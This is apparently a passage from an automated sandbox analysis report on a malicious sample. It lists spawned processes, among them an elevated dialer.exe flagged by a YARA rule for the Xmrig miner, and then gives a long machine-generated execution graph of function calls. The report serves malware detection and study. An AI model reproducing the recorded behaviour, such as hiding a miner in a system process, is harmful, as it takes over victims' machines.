                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:C:\Windows\System32\dialer.exe
                                                                                                                                        Imagebase:0x7ff7fb370000
                                                                                                                                        File size:39'936 bytes
                                                                                                                                        MD5 hash:B2626BDCF079C6516FC016AC5646DF93
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Yara matches:
                                                                                                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000035.00000002.2890430367.0000014A059CF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                        Has exited:false

                                                                                                                                        Target ID:54
                                                                                                                                        Start time:15:22:08
                                                                                                                                        Start date:01/03/2024
                                                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
                                                                                                                                        Imagebase:0x7ff6eef20000
                                                                                                                                        File size:55'320 bytes
                                                                                                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                        Has elevated privileges:false
                                                                                                                                        Has administrator privileges:false
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Has exited:false

                                                                                                                                        Target ID:55
                                                                                                                                        Start time:15:22:09
                                                                                                                                        Start date:01/03/2024
                                                                                                                                        Path:C:\Windows\System32\timeout.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:Timeout /T 1 /Nobreak
                                                                                                                                        Imagebase:0x7ff63ae30000
                                                                                                                                        File size:32'768 bytes
                                                                                                                                        MD5 hash:100065E21CFBBDE57CBA2838921F84D6
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Has exited:true

                                                                                                                                        Target ID:224
                                                                                                                                        Start time:15:22:17
                                                                                                                                        Start date:01/03/2024
                                                                                                                                        Path:C:\Windows\System32\Conhost.exe
                                                                                                                                        Wow64 process (32bit):
                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                        Imagebase:
                                                                                                                                        File size:862'208 bytes
                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                        Has elevated privileges:
                                                                                                                                        Has administrator privileges:
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Has exited:false

                                                                                                                                        Reset < >

                                                                                                                                          Execution Graph

                                                                                                                                          Execution Coverage:11.1%
                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                          Signature Coverage:17.7%
                                                                                                                                          Total number of Nodes:2000
                                                                                                                                          Total number of Limit Nodes:31
                                                                                                                                          execution_graph 16007 7ff61d32c17c 16028 7ff61d32c34c 16007->16028 16010 7ff61d32c2c8 16128 7ff61d32c67c IsProcessorFeaturePresent 16010->16128 16011 7ff61d32c198 __scrt_acquire_startup_lock 16013 7ff61d32c2d2 16011->16013 16018 7ff61d32c1b6 __scrt_release_startup_lock 16011->16018 16014 7ff61d32c67c 7 API calls 16013->16014 16016 7ff61d32c2dd __CxxCallCatchBlock 16014->16016 16015 7ff61d32c1db 16017 7ff61d32c261 16034 7ff61d32c7c8 16017->16034 16018->16015 16018->16017 16117 7ff61d33a1bc 16018->16117 16020 7ff61d32c266 16037 7ff61d321000 16020->16037 16025 7ff61d32c289 16025->16016 16124 7ff61d32c4e0 16025->16124 16135 7ff61d32c94c 16028->16135 16031 7ff61d32c190 16031->16010 16031->16011 16032 7ff61d32c37b __scrt_initialize_crt 16032->16031 16137 7ff61d32da98 16032->16137 16164 7ff61d32d1e0 16034->16164 16038 7ff61d32100b 16037->16038 16166 7ff61d3287b0 16038->16166 16040 7ff61d32101d 16173 7ff61d335ff8 16040->16173 16042 7ff61d3239cb 16180 7ff61d321eb0 16042->16180 16045 7ff61d323ad2 16047 7ff61d32bdc0 _wfindfirst32i64 8 API calls 16045->16047 16048 7ff61d323b93 16047->16048 16122 7ff61d32c80c GetModuleHandleW 16048->16122 16049 7ff61d3239ea 16049->16045 16196 7ff61d327b70 16049->16196 16051 7ff61d323a1f 16052 7ff61d323a6b 16051->16052 16053 7ff61d327b70 61 API calls 16051->16053 16211 7ff61d328050 16052->16211 16058 7ff61d323a40 __std_exception_copy 16053->16058 16055 7ff61d323a80 16215 7ff61d321cb0 16055->16215 16058->16052 16063 7ff61d328050 58 API calls 16058->16063 16059 7ff61d323b4d 16060 7ff61d323bad 16059->16060 16234 7ff61d328980 16059->16234 16060->16045 16066 7ff61d323bfb 16060->16066 16258 7ff61d328be0 16060->16258 16061 7ff61d321cb0 121 API calls 16062 7ff61d323ab6 16061->16062 16064 7ff61d323ad7 16062->16064 16065 7ff61d323aba 16062->16065 16063->16052 16064->16059 16347 7ff61d323fe0 16064->16347 16334 7ff61d322b30 16065->16334 16272 7ff61d326df0 16066->16272 16070 7ff61d323be0 16074 7ff61d323bee SetDllDirectoryW 16070->16074 16075 7ff61d323b73 16070->16075 16074->16066 16080 7ff61d322b30 59 API calls 16075->16080 16079 7ff61d323af5 16084 7ff61d322b30 59 API calls 16079->16084 16080->16045 16083 7ff61d323c15 16108 7ff61d323c47 16083->16108 16379 7ff61d326600 16083->16379 16084->16045 16085 7ff61d323b23 16085->16059 16089 7ff61d323b28 16085->16089 16086 7ff61d323d06 16276 7ff61d3234c0 16086->16276 16366 7ff61d33028c 16089->16366 16093 7ff61d323c66 16099 7ff61d323ca8 16093->16099 16415 7ff61d321ef0 16093->16415 16094 7ff61d323c49 16098 7ff61d326850 FreeLibrary 16094->16098 16098->16108 16099->16045 16419 7ff61d323460 16099->16419 16101 7ff61d323d20 16284 7ff61d327fe0 16101->16284 16102 7ff61d323c38 16409 7ff61d326c40 16102->16409 16106 7ff61d323d33 16109 7ff61d327b70 61 API calls 16106->16109 16107 7ff61d323ce1 16111 7ff61d326850 FreeLibrary 16107->16111 16108->16086 16108->16093 16110 7ff61d323d3f 16109->16110 16291 7ff61d328090 16110->16291 16111->16045 16118 7ff61d33a1f4 16117->16118 16119 7ff61d33a1d3 16117->16119 18801 7ff61d33aa68 16118->18801 16119->16017 16123 7ff61d32c81d 16122->16123 16123->16025 16126 7ff61d32c4f1 16124->16126 16125 7ff61d32c2a0 16125->16015 16126->16125 16127 7ff61d32da98 __scrt_initialize_crt 7 API calls 16126->16127 16127->16125 16129 7ff61d32c6a2 _wfindfirst32i64 __scrt_get_show_window_mode 16128->16129 16130 7ff61d32c6c1 RtlCaptureContext RtlLookupFunctionEntry 16129->16130 16131 7ff61d32c726 __scrt_get_show_window_mode 16130->16131 16132 7ff61d32c6ea RtlVirtualUnwind 16130->16132 16133 7ff61d32c758 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 16131->16133 16132->16131 16134 7ff61d32c7aa _wfindfirst32i64 16133->16134 16134->16013 16136 7ff61d32c36e __scrt_dllmain_crt_thread_attach 16135->16136 16136->16031 16136->16032 16138 7ff61d32daaa 16137->16138 16139 7ff61d32daa0 16137->16139 16138->16031 16143 7ff61d32de14 16139->16143 16144 7ff61d32daa5 16143->16144 16145 7ff61d32de23 16143->16145 16147 7ff61d32de80 16144->16147 16151 7ff61d32e050 16145->16151 16148 7ff61d32deab 16147->16148 16149 7ff61d32de8e DeleteCriticalSection 16148->16149 16150 7ff61d32deaf 16148->16150 16149->16148 16150->16138 16155 7ff61d32deb8 16151->16155 16161 7ff61d32dfd2 TlsFree 16155->16161 16162 7ff61d32defc __vcrt_FlsAlloc 16155->16162 16156 7ff61d32df2a LoadLibraryExW 16158 7ff61d32df4b GetLastError 16156->16158 16159 7ff61d32dfa1 16156->16159 16157 7ff61d32dfc1 GetProcAddress 16157->16161 16158->16162 16159->16157 16160 7ff61d32dfb8 FreeLibrary 16159->16160 16160->16157 16162->16156 16162->16157 16162->16161 16163 7ff61d32df6d LoadLibraryExW 16162->16163 16163->16159 16163->16162 16165 7ff61d32c7df GetStartupInfoW 16164->16165 16165->16020 16168 7ff61d3287cf 16166->16168 16167 7ff61d328820 WideCharToMultiByte 16167->16168 16170 7ff61d3288c6 16167->16170 16168->16167 16168->16170 16171 7ff61d328874 WideCharToMultiByte 16168->16171 16172 7ff61d3287d7 __std_exception_copy 16168->16172 16453 7ff61d3229e0 16170->16453 16171->16168 16171->16170 16172->16040 16176 7ff61d340150 16173->16176 16174 7ff61d3401a3 16175 7ff61d33aed8 _invalid_parameter_noinfo 37 API calls 16174->16175 16177 7ff61d3401cc 16175->16177 16176->16174 16178 7ff61d3401f6 16176->16178 16177->16042 16784 7ff61d340028 16178->16784 16181 7ff61d321ec5 16180->16181 16182 7ff61d321ee0 16181->16182 16792 7ff61d322890 16181->16792 16182->16045 16184 7ff61d323ed0 16182->16184 16185 7ff61d32bd60 16184->16185 16186 7ff61d323edc GetModuleFileNameW 16185->16186 16187 7ff61d323f0b 16186->16187 16188 7ff61d323f22 16186->16188 16189 7ff61d3229e0 57 API calls 16187->16189 16832 7ff61d328cf0 16188->16832 16191 7ff61d323f1e 16189->16191 16193 7ff61d32bdc0 _wfindfirst32i64 8 API calls 16191->16193 16195 7ff61d323f5f 16193->16195 16194 7ff61d322b30 59 API calls 16194->16191 16195->16049 16197 7ff61d327b7a 16196->16197 16198 7ff61d328be0 57 API calls 16197->16198 16199 7ff61d327b9c GetEnvironmentVariableW 16198->16199 16200 7ff61d327c06 16199->16200 16201 7ff61d327bb4 ExpandEnvironmentStringsW 16199->16201 16202 7ff61d32bdc0 _wfindfirst32i64 8 API calls 16200->16202 16203 7ff61d328cf0 59 API calls 16201->16203 16204 7ff61d327c18 16202->16204 16205 7ff61d327bdc 16203->16205 16204->16051 16205->16200 16206 7ff61d327be6 16205->16206 16843 7ff61d33aa9c 16206->16843 16209 7ff61d32bdc0 _wfindfirst32i64 8 API calls 16210 7ff61d327bfe 16209->16210 16210->16051 16212 7ff61d328be0 57 API calls 16211->16212 16213 7ff61d328067 SetEnvironmentVariableW 16212->16213 16214 7ff61d32807f __std_exception_copy 16213->16214 16214->16055 16216 7ff61d321cbe 16215->16216 16217 7ff61d321ef0 49 API calls 16216->16217 16218 7ff61d321cf4 16217->16218 16219 7ff61d321ef0 49 API calls 16218->16219 16229 7ff61d321dde 16218->16229 16220 7ff61d321d1a 16219->16220 16220->16229 16850 7ff61d321aa0 16220->16850 16221 7ff61d32bdc0 _wfindfirst32i64 8 API calls 16222 7ff61d321e6c 16221->16222 16222->16059 16222->16061 16226 7ff61d321dcc 16227 7ff61d323e50 49 API calls 16226->16227 16227->16229 16228 7ff61d321d8f 16228->16226 16230 7ff61d321e34 16228->16230 16229->16221 16231 7ff61d323e50 49 API calls 16230->16231 16232 7ff61d321e41 16231->16232 16886 7ff61d324060 16232->16886 16235 7ff61d328995 16234->16235 16928 7ff61d328660 GetCurrentProcess OpenProcessToken 16235->16928 16238 7ff61d328660 7 API calls 16239 7ff61d3289c1 16238->16239 16240 7ff61d3289da 16239->16240 16241 7ff61d3289f4 16239->16241 16938 7ff61d328750 16240->16938 16242 7ff61d328750 48 API calls 16241->16242 16245 7ff61d328a07 LocalFree LocalFree 16242->16245 16246 7ff61d328a23 16245->16246 16248 7ff61d328a2f 16245->16248 16942 7ff61d322c50 16246->16942 16249 7ff61d32bdc0 _wfindfirst32i64 8 API calls 16248->16249 16250 7ff61d323b6e 16249->16250 16250->16075 16251 7ff61d3214f0 16250->16251 16252 7ff61d32157f 16251->16252 16254 7ff61d321506 16251->16254 16252->16060 17146 7ff61d327960 16254->17146 16256 7ff61d322b30 59 API calls 16257 7ff61d321564 16256->16257 16257->16060 16259 7ff61d328c87 MultiByteToWideChar 16258->16259 16260 7ff61d328c01 MultiByteToWideChar 16258->16260 16262 7ff61d328caa 16259->16262 16263 7ff61d328ccf 16259->16263 16261 7ff61d328c27 16260->16261 16265 7ff61d328c4c 16260->16265 16264 7ff61d3229e0 55 API calls 16261->16264 16266 7ff61d3229e0 55 API calls 16262->16266 16263->16070 16267 7ff61d328c3a 16264->16267 16265->16259 16269 7ff61d328c62 16265->16269 16268 7ff61d328cbd 16266->16268 16267->16070 16268->16070 16270 7ff61d3229e0 55 API calls 16269->16270 16271 7ff61d328c75 16270->16271 16271->16070 16273 7ff61d326e05 16272->16273 16274 7ff61d323c00 16273->16274 16275 7ff61d322890 59 API calls 16273->16275 16274->16108 16370 7ff61d326aa0 16274->16370 16275->16274 16280 7ff61d323533 16276->16280 16282 7ff61d323574 16276->16282 16277 7ff61d32bdc0 _wfindfirst32i64 8 API calls 16278 7ff61d3235c5 16277->16278 16278->16045 16283 7ff61d328950 LocalFree 16278->16283 16280->16282 17473 7ff61d321710 16280->17473 17515 7ff61d322d70 16280->17515 16282->16277 16283->16101 16285 7ff61d328be0 57 API calls 16284->16285 16286 7ff61d327fff 16285->16286 16287 7ff61d328be0 57 API calls 16286->16287 16288 7ff61d32800f 16287->16288 16289 7ff61d337eec 38 API calls 16288->16289 16290 7ff61d32801d __std_exception_copy 16289->16290 16290->16106 16292 7ff61d3280a0 16291->16292 16293 7ff61d328be0 57 API calls 16292->16293 16294 7ff61d3280d1 SetConsoleCtrlHandler GetStartupInfoW 16293->16294 16295 7ff61d328132 16294->16295 17941 7ff61d33ab14 16295->17941 16335 7ff61d322b50 16334->16335 16336 7ff61d334bc4 49 API calls 16335->16336 16337 7ff61d322b9b __scrt_get_show_window_mode 16336->16337 16338 7ff61d328be0 57 API calls 16337->16338 16339 7ff61d322bd0 16338->16339 16340 7ff61d322c0d MessageBoxA 16339->16340 16341 7ff61d322bd5 16339->16341 16343 7ff61d322c27 16340->16343 16342 7ff61d328be0 57 API calls 16341->16342 16344 7ff61d322bef MessageBoxW 16342->16344 16345 7ff61d32bdc0 _wfindfirst32i64 8 API calls 16343->16345 16344->16343 16346 7ff61d322c37 16345->16346 16346->16045 16348 7ff61d323fec 16347->16348 16349 7ff61d328be0 57 API calls 16348->16349 16350 7ff61d324017 16349->16350 16351 7ff61d328be0 57 API calls 16350->16351 16352 7ff61d32402a 16351->16352 17997 7ff61d3365a8 16352->17997 16355 7ff61d32bdc0 _wfindfirst32i64 8 API calls 16356 7ff61d323aed 16355->16356 16356->16079 16357 7ff61d3282c0 16356->16357 16358 7ff61d3282e4 16357->16358 16359 7ff61d330914 73 API calls 16358->16359 16364 7ff61d3283bb __std_exception_copy 16358->16364 16360 7ff61d3282fe 16359->16360 16360->16364 18376 7ff61d339170 16360->18376 16362 7ff61d330914 73 API calls 16365 7ff61d328313 16362->16365 16363 7ff61d3305dc _fread_nolock 53 API calls 16363->16365 16364->16085 16365->16362 16365->16363 16365->16364 16367 7ff61d3302bc 16366->16367 18391 7ff61d330068 16367->18391 16369 7ff61d3302d5 16369->16079 16371 7ff61d326ada 16370->16371 16372 7ff61d326ac3 16370->16372 16371->16083 16372->16371 18402 7ff61d3215a0 16372->18402 16374 7ff61d326ae4 16374->16371 16375 7ff61d324060 49 API calls 16374->16375 16376 7ff61d326b45 16375->16376 16377 7ff61d322b30 59 API calls 16376->16377 16378 7ff61d326bb5 __std_exception_copy memcpy_s 16376->16378 16377->16371 16378->16083 16385 7ff61d32661a memcpy_s 16379->16385 16381 7ff61d32673f 16383 7ff61d324060 49 API calls 16381->16383 16382 7ff61d32675b 16386 7ff61d322b30 59 API calls 16382->16386 16384 7ff61d3267b8 16383->16384 16389 7ff61d324060 49 API calls 16384->16389 16385->16381 16385->16382 16387 7ff61d324060 49 API calls 16385->16387 16388 7ff61d326720 16385->16388 16396 7ff61d321710 135 API calls 16385->16396 16397 7ff61d326741 16385->16397 18426 7ff61d321950 16385->18426 16390 7ff61d326751 __std_exception_copy 16386->16390 16387->16385 16388->16381 16391 7ff61d324060 49 API calls 16388->16391 16394 7ff61d3267e8 16389->16394 16392 7ff61d32bdc0 _wfindfirst32i64 8 API calls 16390->16392 16391->16381 16393 7ff61d323c26 16392->16393 16393->16094 16399 7ff61d326580 16393->16399 16395 7ff61d324060 49 API calls 16394->16395 16395->16390 16396->16385 16398 7ff61d322b30 59 API calls 16397->16398 16398->16390 18430 7ff61d328270 16399->18430 16401 7ff61d32659c 16402 7ff61d328270 58 API calls 16401->16402 16403 7ff61d3265af 16402->16403 16404 7ff61d3265e5 16403->16404 16406 7ff61d3265c7 16403->16406 16405 7ff61d322b30 59 API calls 16404->16405 16407 7ff61d323c34 16405->16407 18434 7ff61d326f00 GetProcAddress 16406->18434 16407->16094 16407->16102 16410 7ff61d326c64 16409->16410 16416 7ff61d321f15 16415->16416 16417 7ff61d334bc4 49 API calls 16416->16417 16418 7ff61d321f38 16417->16418 16418->16099 18493 7ff61d325bd0 16419->18493 16422 7ff61d3234ad 16422->16107 16424 7ff61d323484 16424->16422 18562 7ff61d325930 16424->18562 16472 7ff61d32bd60 16453->16472 16456 7ff61d322a29 16474 7ff61d334bc4 16456->16474 16461 7ff61d321ef0 49 API calls 16462 7ff61d322a86 __scrt_get_show_window_mode 16461->16462 16463 7ff61d328be0 54 API calls 16462->16463 16464 7ff61d322abb 16463->16464 16465 7ff61d322af8 MessageBoxA 16464->16465 16466 7ff61d322ac0 16464->16466 16468 7ff61d322b12 16465->16468 16467 7ff61d328be0 54 API calls 16466->16467 16469 7ff61d322ada MessageBoxW 16467->16469 16470 7ff61d32bdc0 _wfindfirst32i64 8 API calls 16468->16470 16469->16468 16471 7ff61d322b22 16470->16471 16471->16172 16473 7ff61d3229fc GetLastError 16472->16473 16473->16456 16475 7ff61d334c1e 16474->16475 16476 7ff61d334c43 16475->16476 16478 7ff61d334c7f 16475->16478 16477 7ff61d33aed8 _invalid_parameter_noinfo 37 API calls 16476->16477 16481 7ff61d334c6d 16477->16481 16504 7ff61d332e50 16478->16504 16482 7ff61d32bdc0 _wfindfirst32i64 8 API calls 16481->16482 16484 7ff61d322a57 16482->16484 16483 7ff61d33b00c __free_lconv_mon 11 API calls 16483->16481 16492 7ff61d328570 16484->16492 16485 7ff61d334d5c 16485->16483 16486 7ff61d334d80 16486->16485 16488 7ff61d334d8a 16486->16488 16487 7ff61d334d31 16489 7ff61d33b00c __free_lconv_mon 11 API calls 16487->16489 16491 7ff61d33b00c __free_lconv_mon 11 API calls 16488->16491 16489->16481 16490 7ff61d334d28 16490->16485 16490->16487 16491->16481 16493 7ff61d32857c 16492->16493 16494 7ff61d328597 GetLastError 16493->16494 16495 7ff61d32859d FormatMessageW 16493->16495 16494->16495 16496 7ff61d3285ec WideCharToMultiByte 16495->16496 16497 7ff61d3285d0 16495->16497 16499 7ff61d328626 16496->16499 16500 7ff61d3285e3 16496->16500 16498 7ff61d3229e0 54 API calls 16497->16498 16498->16500 16501 7ff61d3229e0 54 API calls 16499->16501 16502 7ff61d32bdc0 _wfindfirst32i64 8 API calls 16500->16502 16501->16500 16503 7ff61d322a5e 16502->16503 16503->16461 16505 7ff61d332e8e 16504->16505 16506 7ff61d332e7e 16504->16506 16507 7ff61d332e97 16505->16507 16512 7ff61d332ec5 16505->16512 16508 7ff61d33aed8 _invalid_parameter_noinfo 37 API calls 16506->16508 16509 7ff61d33aed8 _invalid_parameter_noinfo 37 API calls 16507->16509 16510 7ff61d332ebd 16508->16510 16509->16510 16510->16485 16510->16486 16510->16487 16510->16490 16512->16506 16512->16510 16514 7ff61d333174 16512->16514 16518 7ff61d3337e0 16512->16518 16544 7ff61d3334a8 16512->16544 16574 7ff61d332d30 16512->16574 16577 7ff61d334a00 16512->16577 16516 7ff61d33aed8 _invalid_parameter_noinfo 37 API calls 16514->16516 16516->16506 16519 7ff61d333895 16518->16519 16520 7ff61d333822 16518->16520 16523 7ff61d33389a 16519->16523 16524 7ff61d3338ef 16519->16524 16521 7ff61d333828 16520->16521 16522 7ff61d3338bf 16520->16522 16530 7ff61d33382d 16521->16530 16533 7ff61d3338fe 16521->16533 16601 7ff61d331d90 16522->16601 16525 7ff61d33389c 16523->16525 16526 7ff61d3338cf 16523->16526 16524->16522 16524->16533 16542 7ff61d333858 16524->16542 16528 7ff61d33383d 16525->16528 16532 7ff61d3338ab 16525->16532 16608 7ff61d331980 16526->16608 16543 7ff61d33392d 16528->16543 16583 7ff61d334144 16528->16583 16530->16528 16534 7ff61d333870 16530->16534 16530->16542 16532->16522 16536 7ff61d3338b0 16532->16536 16533->16543 16615 7ff61d3321a0 16533->16615 16534->16543 16593 7ff61d334600 16534->16593 16536->16543 16597 7ff61d334798 16536->16597 16538 7ff61d32bdc0 _wfindfirst32i64 8 API calls 16540 7ff61d333bc3 16538->16540 16540->16512 16542->16543 16622 7ff61d33ef18 16542->16622 16543->16538 16545 7ff61d3334b3 16544->16545 16546 7ff61d3334c9 16544->16546 16547 7ff61d333507 16545->16547 16549 7ff61d333895 16545->16549 16550 7ff61d333822 16545->16550 16546->16547 16548 7ff61d33aed8 _invalid_parameter_noinfo 37 API calls 16546->16548 16547->16512 16548->16547 16553 7ff61d33389a 16549->16553 16554 7ff61d3338ef 16549->16554 16551 7ff61d333828 16550->16551 16552 7ff61d3338bf 16550->16552 16560 7ff61d33382d 16551->16560 16562 7ff61d3338fe 16551->16562 16557 7ff61d331d90 38 API calls 16552->16557 16555 7ff61d33389c 16553->16555 16556 7ff61d3338cf 16553->16556 16554->16552 16554->16562 16572 7ff61d333858 16554->16572 16558 7ff61d33383d 16555->16558 16565 7ff61d3338ab 16555->16565 16561 7ff61d331980 38 API calls 16556->16561 16557->16572 16559 7ff61d334144 47 API calls 16558->16559 16573 7ff61d33392d 16558->16573 16559->16572 16560->16558 16563 7ff61d333870 16560->16563 16560->16572 16561->16572 16564 7ff61d3321a0 38 API calls 16562->16564 16562->16573 16566 7ff61d334600 47 API calls 16563->16566 16563->16573 16564->16572 16565->16552 16567 7ff61d3338b0 16565->16567 16566->16572 16569 7ff61d334798 37 API calls 16567->16569 16567->16573 16568 7ff61d32bdc0 _wfindfirst32i64 8 API calls 16570 7ff61d333bc3 16568->16570 16569->16572 16570->16512 16571 7ff61d33ef18 47 API calls 16571->16572 16572->16571 16572->16573 16573->16568 16759 7ff61d330f54 16574->16759 16578 7ff61d334a17 16577->16578 16776 7ff61d33e078 16578->16776 16584 7ff61d334166 16583->16584 16632 7ff61d330dc0 16584->16632 16589 7ff61d334a00 45 API calls 16590 7ff61d3342a3 16589->16590 16591 7ff61d334a00 45 API calls 16590->16591 16592 7ff61d33432c 16590->16592 16591->16592 16592->16542 16594 7ff61d334680 16593->16594 16595 7ff61d334618 16593->16595 16594->16542 16595->16594 16596 7ff61d33ef18 47 API calls 16595->16596 16596->16594 16599 7ff61d3347b9 16597->16599 16598 7ff61d33aed8 _invalid_parameter_noinfo 37 API calls 16600 7ff61d3347ea 16598->16600 16599->16598 16599->16600 16600->16542 16603 7ff61d331dc3 16601->16603 16602 7ff61d331df2 16604 7ff61d330dc0 12 API calls 16602->16604 16607 7ff61d331e2f 16602->16607 16603->16602 16605 7ff61d331eaf 16603->16605 16604->16607 16606 7ff61d33aed8 _invalid_parameter_noinfo 37 API calls 16605->16606 16606->16607 16607->16542 16609 7ff61d3319b3 16608->16609 16610 7ff61d3319e2 16609->16610 16612 7ff61d331a9f 16609->16612 16611 7ff61d330dc0 12 API calls 16610->16611 16614 7ff61d331a1f 16610->16614 16611->16614 16613 7ff61d33aed8 _invalid_parameter_noinfo 37 API calls 16612->16613 16613->16614 16614->16542 16616 7ff61d3321d3 16615->16616 16617 7ff61d332202 16616->16617 16619 7ff61d3322bf 16616->16619 16618 7ff61d330dc0 12 API calls 16617->16618 16621 7ff61d33223f 16617->16621 16618->16621 16620 7ff61d33aed8 _invalid_parameter_noinfo 37 API calls 16619->16620 16620->16621 16621->16542 16623 7ff61d33ef40 16622->16623 16624 7ff61d33ef85 16623->16624 16626 7ff61d334a00 45 API calls 16623->16626 16628 7ff61d33ef45 __scrt_get_show_window_mode 16623->16628 16631 7ff61d33ef6e __scrt_get_show_window_mode 16623->16631 16627 7ff61d3405c8 WideCharToMultiByte 16624->16627 16624->16628 16624->16631 16625 7ff61d33aed8 _invalid_parameter_noinfo 37 API calls 16625->16628 16626->16624 16629 7ff61d33f061 16627->16629 16628->16542 16629->16628 16630 7ff61d33f076 GetLastError 16629->16630 16630->16628 16630->16631 16631->16625 16631->16628 16633 7ff61d330de6 16632->16633 16634 7ff61d330df7 16632->16634 16640 7ff61d33ec30 16633->16640 16634->16633 16635 7ff61d33dcbc _fread_nolock 12 API calls 16634->16635 16636 7ff61d330e24 16635->16636 16637 7ff61d330e38 16636->16637 16638 7ff61d33b00c __free_lconv_mon 11 API calls 16636->16638 16639 7ff61d33b00c __free_lconv_mon 11 API calls 16637->16639 16638->16637 16639->16633 16641 7ff61d33ec4d 16640->16641 16642 7ff61d33ec80 16640->16642 16643 7ff61d33aed8 _invalid_parameter_noinfo 37 API calls 16641->16643 16642->16641 16644 7ff61d33ecb2 16642->16644 16653 7ff61d334281 16643->16653 16645 7ff61d33edc5 16644->16645 16657 7ff61d33ecfa 16644->16657 16646 7ff61d33eeb7 16645->16646 16648 7ff61d33ee7d 16645->16648 16650 7ff61d33ee4c 16645->16650 16652 7ff61d33ee0f 16645->16652 16655 7ff61d33ee05 16645->16655 16686 7ff61d33e11c 16646->16686 16679 7ff61d33e4b4 16648->16679 16672 7ff61d33e794 16650->16672 16662 7ff61d33e9c4 16652->16662 16653->16589 16653->16590 16655->16648 16656 7ff61d33ee0a 16655->16656 16656->16650 16656->16652 16657->16653 16658 7ff61d33ab3c __std_exception_copy 37 API calls 16657->16658 16659 7ff61d33edb2 16658->16659 16659->16653 16660 7ff61d33afc4 _wfindfirst32i64 17 API calls 16659->16660 16661 7ff61d33ef14 16660->16661 16695 7ff61d34481c 16662->16695 16666 7ff61d33ea70 16666->16653 16667 7ff61d33eac1 16748 7ff61d33e5b0 16667->16748 16668 7ff61d33ea6c 16668->16666 16668->16667 16669 7ff61d33ea8c 16668->16669 16744 7ff61d33e86c 16669->16744 16673 7ff61d34481c 38 API calls 16672->16673 16674 7ff61d33e7de 16673->16674 16675 7ff61d344264 37 API calls 16674->16675 16676 7ff61d33e82e 16675->16676 16677 7ff61d33e832 16676->16677 16678 7ff61d33e86c 45 API calls 16676->16678 16677->16653 16678->16677 16680 7ff61d34481c 38 API calls 16679->16680 16681 7ff61d33e4ff 16680->16681 16682 7ff61d344264 37 API calls 16681->16682 16683 7ff61d33e557 16682->16683 16684 7ff61d33e55b 16683->16684 16685 7ff61d33e5b0 45 API calls 16683->16685 16684->16653 16685->16684 16687 7ff61d33e161 16686->16687 16688 7ff61d33e194 16686->16688 16689 7ff61d33aed8 _invalid_parameter_noinfo 37 API calls 16687->16689 16690 7ff61d33e1ac 16688->16690 16692 7ff61d33e22d 16688->16692 16694 7ff61d33e18d __scrt_get_show_window_mode 16689->16694 16691 7ff61d33e4b4 46 API calls 16690->16691 16691->16694 16693 7ff61d334a00 45 API calls 16692->16693 16692->16694 16693->16694 16694->16653 16696 7ff61d34486f fegetenv 16695->16696 16697 7ff61d34877c 37 API calls 16696->16697 16703 7ff61d3448c2 16697->16703 16698 7ff61d3448ef 16702 7ff61d33ab3c __std_exception_copy 37 API calls 16698->16702 16699 7ff61d3449b2 16700 7ff61d34877c 37 API calls 16699->16700 16701 7ff61d3449dc 16700->16701 16706 7ff61d34877c 37 API calls 16701->16706 16707 7ff61d34496d 16702->16707 16703->16699 16704 7ff61d3448dd 16703->16704 16705 7ff61d34498c 16703->16705 16704->16698 16704->16699 16710 7ff61d33ab3c __std_exception_copy 37 API calls 16705->16710 16708 7ff61d3449ed 16706->16708 16709 7ff61d345a94 16707->16709 16714 7ff61d344975 16707->16714 16711 7ff61d348970 20 API calls 16708->16711 16712 7ff61d33afc4 _wfindfirst32i64 17 API calls 16709->16712 16710->16707 16722 7ff61d344a56 __scrt_get_show_window_mode 16711->16722 16713 7ff61d345aa9 16712->16713 16715 7ff61d32bdc0 _wfindfirst32i64 8 API calls 16714->16715 16716 7ff61d33ea11 16715->16716 16740 7ff61d344264 16716->16740 16717 7ff61d344dff __scrt_get_show_window_mode 16718 7ff61d34513f 16719 7ff61d344380 37 API calls 16718->16719 16726 7ff61d345857 16719->16726 16720 7ff61d3450eb 16720->16718 16723 7ff61d345aac memcpy_s 37 API calls 16720->16723 16721 7ff61d344a97 memcpy_s 16734 7ff61d3453db memcpy_s __scrt_get_show_window_mode 16721->16734 16736 7ff61d344ef3 memcpy_s __scrt_get_show_window_mode 16721->16736 16722->16717 16722->16721 16724 7ff61d3355c4 _findclose 11 API calls 16722->16724 16723->16718 16725 7ff61d344ed0 16724->16725 16727 7ff61d33afa4 _invalid_parameter_noinfo 37 API calls 16725->16727 16728 7ff61d345aac memcpy_s 37 API calls 16726->16728 16738 7ff61d3458b2 16726->16738 16727->16721 16728->16738 16729 7ff61d345a38 16730 7ff61d34877c 37 API calls 16729->16730 16730->16714 16731 7ff61d3355c4 11 API calls _findclose 16731->16734 16732 7ff61d3355c4 11 API calls _findclose 16732->16736 16733 7ff61d33afa4 37 API calls _invalid_parameter_noinfo 16733->16736 16734->16718 16734->16720 16734->16731 16739 7ff61d33afa4 37 API calls _invalid_parameter_noinfo 16734->16739 16735 7ff61d344380 37 API calls 16735->16738 16736->16720 16736->16732 16736->16733 16737 7ff61d345aac memcpy_s 37 API calls 16737->16738 16738->16729 16738->16735 16738->16737 16739->16734 16741 7ff61d344283 16740->16741 16742 7ff61d33aed8 _invalid_parameter_noinfo 37 API calls 16741->16742 16743 7ff61d3442ae memcpy_s 16741->16743 16742->16743 16743->16668 16745 7ff61d33e898 memcpy_s 16744->16745 16746 7ff61d334a00 45 API calls 16745->16746 16747 7ff61d33e952 